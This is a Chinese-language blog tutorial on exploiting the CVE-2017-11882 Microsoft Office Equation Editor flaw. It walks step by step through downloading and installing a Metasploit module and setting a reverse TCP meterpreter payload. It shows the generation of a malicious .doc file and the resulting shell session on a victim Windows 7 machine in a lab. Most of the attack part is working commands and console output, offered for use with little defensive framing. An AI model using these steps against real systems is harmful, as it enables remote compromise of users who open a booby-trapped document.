cve-2017-11882漏洞利用-白红宇

概述

这是一个潜伏了17年之久的远程代码执行漏洞，这个漏洞影响了目前所有的流行office软件，原理是利用了office的一个EQNEDT32.EXE组件，就是公式编辑器组件，详细的你可以看freebuf的这篇文章

我们现在说攻击

操作

首先下载metasploit的攻击模块

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb

之后移动到下面这个目录

mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat

接着启动metasploit

输入

use exploit/windows/fileformat/office_ms17_11882

接着看一下设置选项

msf exploit(office_ms17_11882) > show optionsModule options (exploit/windows/fileformat/office_ms17_11882):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   FILENAME                   yes       Filename to save as   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0   SRVPORT   8080             yes       The local port to listen on.   SSL       false            no        Negotiate SSL for incoming connections   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)   URIPATH                    no        The URI to use for this exploit (default is random)Payload options (windows/x64/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST                      yes       The listen address   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Automatic

设置生成的文件名字

set filename bboysoul.doc

设置主机ip

set lhost 192.168.1.102

开始攻击

exploit

msf exploit(office_ms17_11882) > exploit[*] Exploit running as background job 0.[*] Started reverse TCP handler on 192.168.1.102:4444 [*] Using URL: http://0.0.0.0:8080/xudLp3[*] Local IP: http://192.168.1.102:8080/xudLp3[*] Server started.

之后当前目录下会生成一个叫bboysoul.doc的文件，我们在受害者机器下打开就好

注意我使用的是office201064位专业版，机器是windows764位

经过测试32位的windows和office是不能用的

接着在受害者机器打开这个文件就好了

msf exploit(office_ms17_11882) > [*] 192.168.1.113    office_ms17_11882 - Handling initial request from 192.168.1.113msf exploit(office_ms17_11882) > [*] 192.168.1.113    office_ms17_11882 - Stage two requested, sending...msf exploit(office_ms17_11882) > [*] Sending stage (205379 bytes) to 192.168.1.113[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.113:49225) at 2017-11-25 05:31:10 -0500msf exploit(office_ms17_11882) > sessionsActive sessions===============  Id  Type                     Information                                 Connection  --  ----                     -----------                                 ----------  1   meterpreter x64/windows  WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B  192.168.1.102:4444 -> 192.168.1.113:49225 (192.168.1.113)

欢迎关注Bboysoul的博客

Have Fun